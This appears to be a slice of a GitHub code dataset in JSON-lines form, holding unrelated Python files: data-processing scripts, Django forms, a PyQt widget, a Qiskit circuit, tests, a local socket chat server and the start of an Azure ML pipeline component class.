in path.items():\n self.paths[key] = pl.Path(val)\n elif not isinstance(name, pl.Path):\n raise TypeError(f\"{name} must be a string or pathlib.Path object\")\n\n def _lazy_data_evaluation(self):\n if self._data is None:\n self._get_data()\n\n def _get_data(self) -> None:\n \"\"\"Read csv data into a single numpy recarray\n\n Returns:\n None\n\n \"\"\"\n str2date = lambda x: dt.datetime.strptime(\n x.decode(\"utf-8\"), \"%Y-%m-%d\"\n )\n all_data = []\n ntimes = 0\n dtype = [(\"date\", dt.datetime)]\n for variable_name, path in self.paths.items():\n if path.exists():\n try:\n arr = np.genfromtxt(\n path,\n dtype=None,\n names=True,\n delimiter=\",\",\n converters={0: str2date},\n )\n except:\n raise IOError(f\"numpy could not parse...'{path}'\")\n\n if self._variables is None:\n self._variables = [variable_name]\n else:\n self._variables.append(variable_name)\n\n # determine the variable type\n if self.meta.is_available(variable_name):\n variable_type = meta.meta_numpy_type(\n self.meta.find_variables(variable_name)[variable_name]\n )\n if (\n \"nsegment\"\n in self.meta.get_dimensions(variable_name)[variable_name]\n ):\n coordinate_name = \"nhm_seg\"\n else:\n coordinate_name = \"nhm_id\"\n else:\n variable_type = np.float32\n coordinate_name = \"nhm_id\"\n\n # set coordinates\n if self._coordinates is None:\n self._coordinates = {}\n if coordinate_name not in list(self._coordinates.keys()):\n self._coordinates[coordinate_name] = [\n idx for idx in arr.dtype.names[1:]\n ]\n\n column_names = [\n f\"{variable_name}_{idx.strip()}\" for idx in arr.dtype.names[1:]\n ]\n arr.dtype.names = [\"date\"] + column_names\n\n # add additional column names to the dtype\n for name in column_names:\n dtype.append((name, variable_type))\n\n all_data.append(arr)\n\n # reset ntimes, if necessary\n ntimes = max(arr.shape[0], ntimes)\n\n self._data = np.zeros(ntimes, dtype=dtype)\n for idx, arr in enumerate(all_data):\n if idx == 0:\n i0 = 0\n else:\n i0 = 1\n for name in arr.dtype.names[i0:]:\n self._data[name][:] = arr[name][:]\n","repo_name":"smwesten-usgs/pyswb","sub_path":"pyswb/utils/csv_utils.py","file_name":"csv_utils.py","file_ext":"py","file_size_in_byte":9618,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"71836374560","text":"from django import forms\nfrom .models import Event, weekendSignupEntry, abroadSignupEntry, beginnerSignupEntry\nfrom django.contrib.auth import get_user_model\n \n\nclass weekendSignupForm(forms.ModelForm):\n class Meta:\n model = weekendSignupEntry\n labels = {\n \"borrowBoard\": \"Do you need to borrow a board?\",\n \"bringBoard\": \"Are you bringing a board?\",\n \"wetsuit\": \"Do you need to borrow a wetsuit?\",\n \"driveCar\": \"I can drive a car for this trip\",\n \"roofRacks\": \"Can you put a roofrack on your car?\",\n \"carSeats\": \"How many seats does your car have? (Inc. Driver)\",\n \"driveMinibus\": \"I can drive a Minibus for this trip\",\n \"tent\": \"If you own a tent how many people can it sleep?\",\n }\n\n fields = [\n 'borrowBoard',\n 'bringBoard',\n 'wetsuit',\n 'driveCar',\n 'roofRacks',\n 'carSeats',\n 'driveMinibus',\n 'tent',\n 'endQuestionAnswer',\n ]\n\n exclude = ['timestamp']\n\nclass abroadSignupForm(forms.ModelForm):\n class Meta:\n model = abroadSignupEntry\n labels = {\n \"rental\": \"Do you want to rent equipment?\",\n \"lessons\": \"Do you want lessons?\",\n }\n\n fields = [\n 'rental',\n 'lessons',\n 'endQuestionAnswer',\n ]\n\n exclude = ['timestamp']\n\nclass beginnerSignupForm(forms.ModelForm):\n class Meta:\n model = beginnerSignupEntry\n labels = {\n \"borrowBoard\": \"Do you need to borrow a board?\",\n \"wetsuit\": \"Do you need to borrow a wetsuit?\",\n \"driveCar\": \"I can drive a car for this trip\",\n \"roofRacks\": \"Can you put a roofrack on your car?\",\n \"carSeats\": \"How many seats does your car have? (Inc. Driver)\",\n }\n\n fields = [\n 'borrowBoard',\n 'wetsuit',\n 'driveCar',\n 'roofRacks',\n 'carSeats',\n 'endQuestionAnswer',\n ]\n\n exclude = ['timestamp']\n\n","repo_name":"Rhetora/susurf-web-public","sub_path":"events/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9915774488","text":"from PyQt5.QtCore import QSortFilterProxyModel, Qt\nfrom PyQt5.QtWidgets import QComboBox, QCompleter\n\n\nclass ExtendedComboBox(QComboBox):\n def __init__(self, parent=None):\n super(ExtendedComboBox, self).__init__(parent)\n\n self.setFocusPolicy(Qt.StrongFocus)\n self.setEditable(True)\n\n # add a filter model to filter matching items\n self.pFilterModel = QSortFilterProxyModel(self)\n self.pFilterModel.setFilterCaseSensitivity(Qt.CaseInsensitive)\n self.pFilterModel.setSourceModel(self.model())\n\n # add a completer, which uses the filter model\n self.completer = QCompleter(self.pFilterModel, self)\n # always show all (filtered) completions\n self.completer.setCompletionMode(QCompleter.UnfilteredPopupCompletion)\n self.setCompleter(self.completer)\n\n # connect signals\n self.lineEdit().textEdited.connect(self.pFilterModel.setFilterFixedString)\n self.completer.activated.connect(self.on_completer_activated)\n\n # on selection of an item from the completer, select the corresponding item from combobox\n def on_completer_activated(self, text):\n if text:\n index = self.findText(text)\n self.setCurrentIndex(index)\n self.activated[str].emit(self.itemText(index))\n\n # on model change, update the models of the filter and completer as well\n def setModel(self, model):\n super(ExtendedComboBox, self).setModel(model)\n self.pFilterModel.setSourceModel(model)\n self.completer.setModel(self.pFilterModel)\n\n # on model column change, update the model column of the filter and completer as well\n def setModelColumn(self, column):\n self.completer.setCompletionColumn(column)\n self.pFilterModel.setFilterKeyColumn(column)\n super(ExtendedComboBox, self).setModelColumn(column)\n","repo_name":"hongyaohongyao/smart_classroom_demo","sub_path":"smart_classroom/my_combox.py","file_name":"my_combox.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":142,"dataset":"github-code","pt":"54"} +{"seq_id":"9984366856","text":"\nfrom qiskit import QuantumProgram, QuantumCircuit\nfrom qiskit.extensions.standard import header\nfrom qiskit import CompositeGate\n\nAPI_FILE = open(\"API_TOKEN.txt\")\nAPI_TOKEN = API_FILE.readlines()[0]\n\nfrom qiskit.tools.visualization import plot_histogram\n\nqp = QuantumProgram()\nqp.set_api(API_TOKEN, API_URL)\n\nq = qp.create_quantum_register('q', 5)\nc = qp.create_classical_register('c', 1)\ncl = qp.create_circuit('cl', [q], [c])\n\n#prepare states\n\ncl.h(q[0])\ncl.h(q[1])\ncl.barrier(q)\n\ncl.cu3(4.304, 0, 0, q[0], q[1])\n\ncl.x(q[0])\n\ncl.ccx(q[0], q[1], q[2])\n\ncl.x(q[1])\n\n#begin controlled-controlled u3\ncl.barrier(q)\n\ncl.cx(q[1], q[2])\ncl.u3(-0.331, 0, 0, q[2])\ncl.ccx(q[0], q[1], q[2])\ncl.cx(q[1], q[2])\ncl.u3(-0.331, 0, 0, q[2])\ncl.cx(q[1], q[2])\ncl.u3(0.331, 0, 0, q[2])\n\n#end controlled-controlled u3\ncl.barrier(q)\n\ncl.swap(q[2],q[3])\ncl.cx(q[2],q[1])\ncl.h(q[0])\n\ncl.barrier(q)\n#measure qbits\ncl.measure(q[2],c[0])\n\n\n#running\n\nbackend_test = \"local_qasm_simulator\"\nshots = 8000\n\nresult = qp.execute('cl', backend=backend_test, timeout=2400, shots=shots)\n\n\ndata = result.get_counts('cl')\n\nplot_histogram(data)\n","repo_name":"4-space/Quantum-Nearest-Neighbors","sub_path":"quantum_nearest_neighbors.py","file_name":"quantum_nearest_neighbors.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5051764905","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\nimport os, glob, sys\r\nimport argparse\r\nimport pandas as pd\r\n\r\n\r\nscript_realpath = os.path.realpath(__file__)\r\nscript_dir = os.path.dirname(script_realpath)\r\n\r\n# print(script_realpath)\r\n# print(script_dir)\r\n\r\nclass bcolors:\r\n HEADER = '\\033[95m'\r\n OKBLUE = '\\033[94m'\r\n OKCYAN = '\\033[96m'\r\n OKGREEN = '\\033[92m'\r\n WARNING = '\\033[93m'\r\n FAIL = '\\033[91m'\r\n ENDC = '\\033[0m'\r\n BOLD = '\\033[1m'\r\n UNDERLINE = '\\033[4m'\r\n\r\n# Parser command-line options\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"-c\", \"--csv-dir\", dest='csv_dir', help=\"Diretório com os arquivos CSV.\", required=True)\r\nparser.add_argument(\"-o\", \"--output-file\", dest='output_file', help=\"Nome do arquivo CSV gerado.\", required=True)\r\n\r\nif len(sys.argv)==1:\r\n parser.print_help(sys.stderr)\r\n print(\"\\n\")\r\n exit(1)\r\nargs = parser.parse_args()\r\n\r\n\r\nCSV_DIR = os.path.realpath(args.csv_dir)\r\nOUTFILE = os.path.join(CSV_DIR, args.output_file+\".stats_merged.csv\")\r\n\r\n## CSV merged dataframe\r\nCSV_DF = pd.DataFrame()\r\n\r\n# Enter csv dir\r\nos.chdir(CSV_DIR)\r\ncwd = os.getcwd()\r\n\r\n\r\n# Merge CSVs\r\ntool_filter=\"*.stats.csv\"\r\nfor csv in glob.glob(tool_filter):\r\n print(f\"Merging CSV: {csv}...\")\r\n df = pd.read_csv(csv)\r\n CSV_DF = pd.concat([CSV_DF, df]).groupby(['Datetime']).sum().reset_index()\r\n\r\n# Leave csv dir\r\nos.chdir(script_dir)\r\n\r\n# Save dataset file\r\nCSV_DF.to_csv(OUTFILE, index=False)\r\n\r\nprint (\"\")\r\nprint(f\"{bcolors.BOLD}************************************************************************************************{bcolors.ENDC}\")\r\nprint(f\"{'CSV_DIR:':>16} {CSV_DIR}\")\r\nprint (\"\")\r\nprint(f\"{bcolors.OKGREEN} MERGED CSV: {bcolors.HEADER+bcolors.BOLD}{os.path.realpath(OUTFILE)}{bcolors.ENDC}\")\r\nprint(f\"{bcolors.BOLD}************************************************************************************************{bcolors.ENDC}\")\r\nprint (\"\")\r\n","repo_name":"lbfiorino/mpca_pub","sub_path":"graficos/merge_datetime_stats.py","file_name":"merge_datetime_stats.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3144138015","text":"import json\nimport pytest\nimport tempfile\n\nimport tick\n\n\ndef test_encode_decode():\n send = tick.Send(\"name\", \"grade\", \"2000-01-01\", \"location\", \"style\", \"notes\")\n encoded = json.dumps(send, cls=tick.SendEncoder)\n decoded = json.loads(encoded, object_hook=tick.as_send)\n assert send == decoded\n\n\ndef test_save_load():\n send = tick.Send(\"name\", \"grade\", \"2000-01-01\", \"location\", \"style\", \"notes\")\n sends = list()\n sends.append(send)\n sends.append(send)\n with tempfile.NamedTemporaryFile() as f:\n filename = f.name\n tick.save(filename, sends)\n loaded = tick.load(filename)\n assert loaded == sends\n\n\ndef test_convert_mp_csv():\n with tempfile.NamedTemporaryFile() as f:\n filename = f.name\n mp_content = b\"\"\"2020-06-07,\"The Hole\",V6,,https://www.mountainproject.com/route/106807930/the-hole,1,\"Washington > Central-East Cascades, Wenatchee, & Leavenworth > Icicle Creek > ** Bouldering in Icicle Creek > Mad Meadows\",3.4,-1,Send,,Boulder,,10,20600\"\"\"\n f.write(mp_content)\n f.seek(0)\n mp_sends = tick.convert_mp_csv(f.name)\n\n send = tick.Send(\n \"The Hole\",\n \"V6\",\n \"2020-06-07\",\n \"Washington > Central-East Cascades, Wenatchee, & Leavenworth > Icicle Creek > ** Bouldering in Icicle Creek > Mad Meadows\",\n \"Send\",\n \"\",\n )\n assert send == mp_sends[0]\n\n\ndef test_filter_by_date_before():\n sends = list()\n sends.append(tick.Send(\"before\", \"v0\", \"1999-12-31\", \"location\", \"send\", \"notes\",))\n sends.append(tick.Send(\"after\", \"v0\", \"2000-01-01\", \"location\", \"send\", \"notes\",))\n filtered = tick.filter_by_date(sends, \"2000-01-01\", tick.DateComparison.BEFORE)\n assert len(filtered) == 1\n assert filtered[0].name == \"before\"\n\n\ndef test_filter_by_date_after():\n sends = list()\n sends.append(tick.Send(\"before\", \"v0\", \"1999-12-31\", \"location\", \"send\", \"notes\",))\n sends.append(tick.Send(\"after\", \"v0\", \"2000-01-01\", \"location\", \"send\", \"notes\",))\n filtered = tick.filter_by_date(sends, \"2000-01-01\", tick.DateComparison.AFTER)\n assert len(filtered) == 1\n assert filtered[0].name == \"after\"\n\ndef test_years_active():\n sends = list()\n sends.append(tick.Send(\"before\", \"v0\", \"1999-12-31\", \"location\", \"send\", \"notes\",))\n sends.append(tick.Send(\"before\", \"v0\", \"2003-12-31\", \"location\", \"send\", \"notes\",))\n sends.append(tick.Send(\"before\", \"v0\", \"2020-12-31\", \"location\", \"send\", \"notes\",))\n years = tick.years_active(sends)\n assert years == {1999, 2003, 2020}\n\ndef test_sends_in_year():\n sends = list()\n sends.append(tick.Send(\"before\", \"v0\", \"1999-12-31\", \"location\", \"send\", \"notes\",))\n sends.append(tick.Send(\"included_0\", \"v0\", \"2003-12-31\", \"location\", \"send\", \"notes\",))\n sends.append(tick.Send(\"included_1\", \"v0\", \"2003-01-01\", \"location\", \"send\", \"notes\",))\n sends.append(tick.Send(\"before\", \"v0\", \"2020-12-31\", \"location\", \"send\", \"notes\",))\n sends_in_2003 = tick.sends_in_year(sends, 2003)\n expected = sends[1:3]\n assert sends_in_2003 == expected\n\n\n\n","repo_name":"tyler-moody/tick","sub_path":"test_tick.py","file_name":"test_tick.py","file_ext":"py","file_size_in_byte":3094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"69911701921","text":"# __author__ = 'ming'\n# coding=utf-8\n\n# 返回状态代码与描述\nCodeMsg = {\n \"0\": \"成功\",\n \"-1\": \"失败\",\n \"404\": \"请先登录\",\n \"505\": \"参数缺失\",\n \"606\": \"没有此操作权限\",\n \"1001\": \"参数格式错误\",\n \"1002\": \"账户或者密码错误\",\n \"2001\": \"缺少method字段,无法确定您的操作目的\",\n \"2002\": \"该版块已存在小版块\",\n \"2003\": \"删除该版块失败,请稍后重试\"\n}\n\nSuccessCode = \"0\"\nFailCode = \"-1\"\nNoLoginCode = \"404\"\nNohasParamCode = \"505\"\nNoPermissionCode = \"606\"\nParamErrCode = \"1001\"\nAccountOrPwErrCode = \"1002\"\n\n# Boards\nNoMethodErrCode = \"2001\"\nHasSmallBoardsCode = \"2002\"\nFailDeleteBigCode = \"2003\"","repo_name":"BPing/pyWebpj","sub_path":"python/globals/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"2489281665","text":"'''\nThis script prepares data and creates basic features for the NFL 1st and Future 2020\nchallenge. It also reduces the memory footprint of datasets and\nsaves them to a memory-efficient format.\n\n'''\n\n#%%\nimport numpy as np\nimport pandas as pd\nimport sys\nfrom tqdm import tqdm\n\nimport skmem #my utility script\n\n\n#%%\ndef convert_days(df, daycols):\n day_buckets = np.array([1, 7, 28, 42])\n days_matrix = df[daycols] * day_buckets\n days_column = days_matrix.max(axis=1)\n return days_column\n\ndef convert_keys(df):\n df = df.fillna({'PlayKey': '0-0-0'})\n try:\n id_array = df.GameID.str.split('-', expand=True).to_numpy()\n except:\n id_array = df.PlayKey.str.split('-', expand=True).to_numpy()\n df['PlayerKey'] = id_array[:,0].astype(int)\n df['GameID'] = id_array[:,1].astype(int)\n df['PlayKey'] = df.PlayKey.str.extract(r'([0-9]+$)').astype(int)\n return df\n\ndef get_rest(group_):\n days_rest = group_.PlayerDay - group_.PlayerDay.shift()\n return pd.Series(days_rest, name='DaysRest').fillna(0).astype(np.int16)\n\nkey_cols = ['PlayerKey', 'GameID', 'PlayKey']\n\n\n#%%#################\n## Plays & Injuries\n#\n\nplaylist = pd.read_csv('../input/nfl-playing-surface-analytics/PlayList.csv')\nprint(playlist.info())\nplaylist = convert_keys(playlist)\nplaylist = playlist.fillna({'PlayType': 'unspecified'})\n\n\n# add new features\nplaylist['PlayCount'] = playlist.groupby('PlayerKey').cumcount() + 1\nplaylist['OnSynthetic'] = np.where(playlist.FieldType == \"Synthetic\", 1, 0)\nplaylist['PlaysSynthetic'] = playlist.groupby('PlayerKey').OnSynthetic\\\n .cumsum()\nplaylist['PlaysNatural'] = playlist.PlayCount - playlist.PlaysSynthetic\nplaylist['PctPlaysSynthetic'] = playlist.PlaysSynthetic/playlist.PlayCount\nplaylist['PctPlaysNatural'] = playlist.PlaysNatural/playlist.PlayCount\nplaylist['PlaysInGame'] = playlist.groupby(key_cols[0:2]).PlayKey\\\n .transform(max)\n\n# get rest_days\ngame_ids = playlist.drop_duplicates(key_cols[0:2]).GameID.to_numpy()\ngames_temp = playlist.drop_duplicates(key_cols[0:2])\\\n .reset_index(drop=True)\\\n .groupby('PlayerKey')\\\n .apply(get_rest)\\\n .reset_index(level=0)\\\n .assign(GameID=game_ids)\nplaylist = playlist.merge(games_temp, how='left', on=key_cols[0:2])\n\n\n# Format column\nplaylist['RosterPosition'] = playlist.RosterPosition.str\\\n .replace(' ', '_', regex=False)\n\n# Condense stadium types\ndef condense_stadiums(type_list, cat_, df=playlist):\n idx = playlist.StadiumType.str.lower().str.contains('|'.join(type_list))\n df.loc[idx, 'StadiumType'] = cat_\n return df\n\nunknown = ['cloudy', 'nan']\nclosed = ['dome', 'ind', 'closed']\nopen_ = ['out', 'open', 'heinz', 'oudoor', 'ourdoor', 'bowl']\n\ntype_list = [unknown, closed, open_]\ncats_ = ['unknown', 'closed', 'open']\n\nplaylist['StadiumType'] = playlist.StadiumType.astype(str)\nfor t,c in zip(type_list, cats_):\n playlist = condense_stadiums(t, c)\n\nplaylist.loc[playlist.StadiumType == \"Retractable Roof\", 'StadiumType'] = \"unknown\"\nprint(playlist.StadiumType.unique())\n\n\n\n# Fix temps\nplaylist.loc[playlist.Temperature == -999, 'Temperature'] = np.nan\nplaylist = playlist.fillna({'Temperature': playlist.Temperature.mean()})\nplaylist['Temperature'] = playlist.Temperature.round(0).astype(int)\n\n\n# Condense weather\nplaylist['Weather'] = playlist.Weather.astype(str)\nplaylist = playlist.fillna({'Weather': 'unknown'})\nprecips = ['rain', 'shower', 'snow']\nprecip_idx = playlist.Weather.str.lower()\\\n .str.contains('|'.join(precips))\nplaylist['Weather'] = \"dry\"\nplaylist.loc[precip_idx, 'Weather'] = \"wet\"\nprint(playlist.Weather.unique())\n\n\n# Dummify and percentify\nplaylist = pd.get_dummies(playlist, columns=['StadiumType', 'Weather'])\ndummycols = ['Weather_wet', 'Weather_dry',\n 'StadiumType_closed', 'StadiumType_open', 'StadiumType_unknown'\n ]\ndummies = playlist.groupby('PlayerKey')[dummycols].transform('sum')\nplaylist['PctWetWeather'] = dummies.Weather_wet / (playlist.PlayCount)\nplaylist['PctOpenStadium'] = dummies.StadiumType_open / (playlist.PlayCount)\nplaylist = playlist.drop(columns=dummycols)\n\n\n# Check positions\nprint(playlist.groupby('PlayerKey')['RosterPosition', 'Position', 'PositionGroup']\\\n .agg('nunique').hist()) #RosterPosition is most consistent\nplaylist = playlist.drop(columns=['Position', 'PositionGroup'])\n\n\n#%%\n# Add injury data\ninjuries = pd.read_csv('../input/nfl-playing-surface-analytics/InjuryRecord.csv')\nprint(injuries.info())\n\n# Reformat days and keys\ndaycols = injuries.columns[injuries.columns.str.startswith('DM')]\ninjuries['DaysMissed'] = convert_days(injuries, daycols)\ninjuries = convert_keys(injuries).drop(columns=daycols)\n\n# Replace unknown injury plays with last play of game\nlast_plays = playlist[['PlayerKey', 'GameID', 'PlaysInGame']]\\\n .drop_duplicates(key_cols[0:2], keep='last')\ninjuries = injuries.merge(last_plays, how='left', on=key_cols[0:2])\ninjuries.loc[injuries.PlayKey == 0, 'PlayKey'] = injuries.PlaysInGame\ninjuries = injuries.drop(columns=['Surface', 'PlaysInGame'])\ninjuries['Missed1Day'] = np.where(injuries.DaysMissed >=1, 1, 0)\ninjuries['Missed7Days'] = np.where(injuries.DaysMissed >=7, 1, 0)\n\nprint(injuries.Missed1Day.sum()) # this check is good\n\n\n# merge and add features\nplaylist = playlist.merge(injuries, how='left', on=key_cols)\nplaylist['InjuredPlay'] = np.where(playlist.BodyPart.isnull(), 0,\n playlist.PlayCount)\nplaylist['MaxPlayCount'] = playlist.groupby('PlayerKey').PlayCount\\\n .transform(max)\nplaylist['MaxPlayInjured'] = playlist.groupby('PlayerKey').InjuredPlay\\\n .transform(max)\nplaylist['FinalPlay'] = np.where(playlist.MaxPlayInjured == 0,\n playlist.MaxPlayCount,\n playlist.MaxPlayInjured)\n\n# cleanup\nplaylist = playlist.fillna({'BodyPart': 'none',\n 'DaysMissed': 0,\n 'Missed1Day': 0,\n 'Missed7Days': 0\n })\n\nplaylist[['DaysMissed', 'Missed1Day', 'Missed7Days']] = \\\n playlist[['DaysMissed', 'Missed1Day', 'Missed7Days']].astype(int)\n\n\nplaylist.Missed1Day.sum() # this check is good\n\n# Redcue memory\nmr = skmem.MemReducer()\nplaylist = mr.fit_transform(playlist)\nplaylist.sort_values(key_cols).to_parquet('PlayListLabeled.parq')\n\n\n\n\n#%%###############\n## NGS Tracks\n#\n\n# Use pandas chunker\ncsize = 4_000_000 #set this to fit your situation\nchunker = pd.read_csv('../input/nfl-playing-surface-analytics/PlayerTrackData.csv', chunksize=csize)\n\ntracks = []\nmr = skmem.MemReducer()\nfor chunk in tqdm(chunker, total = int(80_000_000/csize)):\n chunk = convert_keys(chunk)\n chunk['event'] = chunk.event.fillna('none')\n floaters = chunk.select_dtypes('float').columns.tolist()\n chunk = mr.fit_transform(chunk, float_cols=floaters)\n tracks.append(chunk)\n\ntracks = pd.concat(tracks)\n\n#%%\ncol_order = [9,10,0,1,2,3,4,6,8,5,7]\ntracks = tracks[[tracks.columns[idx] for idx in col_order]]\n\ntracks['event'] = tracks.event.astype('category')\n\n# two plays stopped on snap - safe to delete 2 rows with null dir, o\ntracks[(tracks.PlayerKey == 39715) &\\\n (tracks.GameID == 18) &\\\n (tracks.PlayKey == 48)]\ntracks[(tracks.PlayerKey == 43489) &\\\n (tracks.GameID == 26) &\\\n (tracks.PlayKey == 53)]\ntracks = tracks[~tracks.dir.isnull()].copy()\n\n\n#%% Create core features\ntracks['VelocityIn'] = tracks.dis/0.1 #s in data is too smooth\ntracks['dir_diff'] = (tracks.dir-tracks.dir.shift())\n\ntracks['AccelLateral'] = np.abs(tracks.VelocityIn.shift(-1)\\\n * np.sin(np.deg2rad(tracks.dir_diff))\n ).rolling(3).mean() / 0.1\ntracks['AccelLong'] = np.abs(tracks.VelocityIn.shift(-1)\\\n * np.cos(np.deg2rad(tracks.dir_diff))\\\n - tracks.VelocityIn\n ).rolling(3).mean() / 0.1\n\n\n#%% Make filter for active part of plays\nstart_events = ['ball_snap', 'snap_direct', 'punt', 'kickoff', 'onside_kick']\nend_events = ['tackle', 'out_of_bounds', 'touchdown',\n 'pass_outcome_incomplete', 'pass_outcome_touchdown', \n 'fair_catch']\nbookends = start_events + end_events\ntracks['sig_event'] = np.where(tracks.event.isin(bookends), 1, 0)\ntracks['segment'] = tracks.groupby(key_cols)['sig_event'].cumsum()\n\n\n# Check effectiveness and cut non-active segments\nprint(tracks.groupby(key_cols).segment.max().value_counts(normalize=True))\ntracks = tracks[tracks.segment == 1]\n\nprint(tracks.shape)\ntracks.reset_index(drop=True).to_parquet('PlayerTrackData.parq')\n","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/nfl-playing-surface-analytics/JohnM/nfl-1standfuture-dataprep.py","file_name":"nfl-1standfuture-dataprep.py","file_ext":"py","file_size_in_byte":8963,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"40610683851","text":"#computer networks final project\n#By: mina mahram/ morva farajzadeh/ zahrafarhadinia\n\nimport socket \nimport threading\n\n\nclass Server:\n lrmessage=\"\"\n clients=[]\n def __init__(self):\n self.ssocket=None\n self.ServerListening()\n \n def ServerListening(self):\n self.ssocket=socket.socket(socket.AF_INET, socket.SOCK_STREAM) \n local_ip='127.0.0.1'\n local_port=12345\n self.ssocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.ssocket.bind((local_ip, local_port))\n print(\"Server is running, Open the Client Program!\")\n \n self.ssocket.listen(5)\n self.MessageRecieving()\n \n def receive_messages(self, soc):\n while True:\n incoming_buffer=soc.recv(1024) \n if not incoming_buffer:\n break\n self.lrmessage=incoming_buffer.decode('utf-8')\n if self.lrmessage[:6] == \"<File>\":\n self.lrmessage = self.receive_file(soc, self.lrmessage[6:])\n self.broadcasting(soc) \n soc.close()\n \n def broadcasting(self, senders_socket):\n for client in self.clients:\n socket, (ip, port)=client\n if socket is not senders_socket:\n socket.sendall(self.lrmessage.encode('utf-8'))\n\n def MessageRecieving(self):\n while True:\n client=soc, (ip, port)=self.ssocket.accept()\n self.ClientList(client)\n print('Connected to ', ip, ':', str(port))\n t = threading.Thread(target=self.receive_messages, args=(soc,))\n t.start()\n \n def receive_file(self, soc, file_details):\n user_name, file_type, file_name, file_size = file_details.split(\"<SEPARATOR>\")\n file_name = os.path.basename(file_name)\n file_size = int(file_size)\n print(\"Receiving file: \", file_name, \" of size: \", file_size)\n\n received_bytes = 0\n with open(file_name, \"wb\") as f:\n while True:\n\n bytes_read = soc.recv(1024)\n received_bytes += len(bytes_read)\n if received_bytes >= file_size:\n break\n\n f.write(bytes_read)\n\n\n print(file_name, \" received successfully!\")\n return f\"<File>{user_name}[{file_type}] {os.path.abspath(file_name)}\" \n \n def ClientList(self, client):\n if client not in self.clients:\n self.clients.append(client)\n\n\nif __name__==\"__main__\":\n Server()","repo_name":"iahraeza/client-server","sub_path":"server_final.py","file_name":"server_final.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"851155118","text":"# coding=utf-8\n'''\nCreated by Amy Chen on 9/25/2016\n'''\n\nclass CSAirMetro():\n #This function will initiate all the information under the city specific\n #inorder to save the data from the json file\n def __init__(self, code, name, country, continent, timezone, coordinates, population, region):\n self.code = code\n self.name = name\n self.country = country\n self.continent = continent\n self.timezone = timezone\n self.coordinates = coordinates\n self.population = population\n self.region = region","repo_name":"haloamy/CSAir","sub_path":"CSAirMetro.py","file_name":"CSAirMetro.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13564786451","text":"import sys\n\nN = int(input())\ns = 0\ne = N-1\nprev = -1\n\ndef bi_search(s, e, prev):\n ### 終了条件 (ここ忘れて WA) ###\n if e - s <= 1:\n print('! ' + str(s+1))\n exit()\n ##############################\n m = (s+e)//2\n print('? ' + str(m+1))\n sys.stdout.flush()\n res = int(input())\n if m + 1 == e:\n if prev + res == 1:\n print('! ' + str(m))\n exit()\n prev = res\n if res == 1:\n bi_search(s, m, prev)\n elif res == 0:\n bi_search(m, e, prev)\n\nbi_search(s, e, prev)","repo_name":"sumugit/atcoder","sub_path":"abc/abc299/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3577690572","text":"import json\nimport logging\nimport re\nimport typing\nfrom collections import Counter\nfrom typing import Dict, List, Optional, Tuple, Union\n\nfrom marshmallow import Schema\n\nfrom azure.ai.ml._restclient.v2022_10_01.models import ComponentVersion, ComponentVersionProperties\nfrom azure.ai.ml._schema import PathAwareSchema\nfrom azure.ai.ml._schema.pipeline.pipeline_component import PipelineComponentSchema\nfrom azure.ai.ml._utils.utils import hash_dict, is_data_binding_expression\nfrom azure.ai.ml.constants._common import ARM_ID_PREFIX, ASSET_ARM_ID_REGEX_FORMAT, COMPONENT_TYPE\nfrom azure.ai.ml.constants._component import ComponentSource, NodeType\nfrom azure.ai.ml.constants._job.pipeline import ValidationErrorCode\nfrom azure.ai.ml.entities._builders import BaseNode, Command\nfrom azure.ai.ml.entities._builders.control_flow_node import ControlFlowNode, LoopNode\nfrom azure.ai.ml.entities._component.component import Component\nfrom azure.ai.ml.entities._inputs_outputs import GroupInput, Input\nfrom azure.ai.ml.entities._job.automl.automl_job import AutoMLJob\nfrom azure.ai.ml.entities._job.pipeline._attr_dict import has_attr_safe, try_get_non_arbitrary_attr\nfrom azure.ai.ml.entities._job.pipeline._pipeline_expression import PipelineExpression\nfrom azure.ai.ml.entities._validation import MutableValidationResult\nfrom azure.ai.ml.exceptions import ErrorCategory, ErrorTarget, ValidationException\n\nmodule_logger = logging.getLogger(__name__)\n\n\nclass PipelineComponent(Component):\n \"\"\"Pipeline component, currently used to store components in an azure.ai.ml.dsl.pipeline.\n\n :param name: Name of the component.\n :type name: str\n :param version: Version of the component.\n :type version: str\n :param description: Description of the component.\n :type description: str\n :param tags: Tag dictionary. Tags can be added, removed, and updated.\n :type tags: dict\n :param display_name: Display name of the component.\n :type display_name: str\n :param inputs: Component inputs.\n :type inputs: dict\n :param outputs: Component outputs.\n :type outputs: dict\n :param jobs: Id to components dict inside the pipeline definition.\n :type jobs: Dict[str, ~azure.ai.ml.entities._builders.BaseNode]\n :param is_deterministic: Whether the pipeline component is deterministic.\n :type is_deterministic: bool\n :raises ~azure.ai.ml.exceptions.ValidationException: Raised if PipelineComponent cannot be successfully validated.\n Details will be provided in the error message.\n \"\"\"\n\n def __init__(\n self,\n *,\n name: Optional[str] = None,\n version: Optional[str] = None,\n description: Optional[str] 